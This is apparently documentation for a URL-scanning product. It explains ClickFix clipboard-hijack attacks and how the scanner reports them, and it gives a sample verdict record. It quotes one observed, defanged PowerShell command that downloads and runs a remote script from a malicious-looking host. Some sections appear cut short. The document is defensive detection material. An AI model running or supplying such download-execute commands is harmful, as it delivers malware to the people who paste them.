urlyze docs

ClickFix and the clipboard

The page never downloads anything. It asks the visitor to prove they are human, and while they click, it puts a shell command on their clipboard and tells them where to paste it. The visitor's own keyboard delivers the payload.

Why a rendered capture comes back clean

Every part of the chain that a passive scan can see is unremarkable. There is no executable download, often no second host contacted during the visit, and the instructions are frequently drawn rather than written — a key cap as an image, the verb as an icon — so text analysis has nothing to count. The one event that matters, the clipboard write, only happens after somebody interacts with the page.

What Urlyze does

The scan makes a throwaway copy of the page and uses it:

What you get on the scan

When the page writes a convictable command, the result carries the mechanism and the destination rather than a counter:

"verdictReason": "Malicious: page copied a hidden download-execute command to the
                  visitor's clipboard behind an anti-bot gate (ClickFix)
                  — Clipboard command reaches: faceit-anti-cheat[.]com"

"clipboardCommandKind": "download-execute"

Alongside it the record states whether the command was hidden from the visible page, whether it was produced by our own press, and a screenshot of the instruction screen as the visitor would have seen it. The command text itself is on the record — the observed example above was irm hxxp://faceit-anti-cheat[.]com/notify.ps1 | iex (defanged here).

Limits worth knowing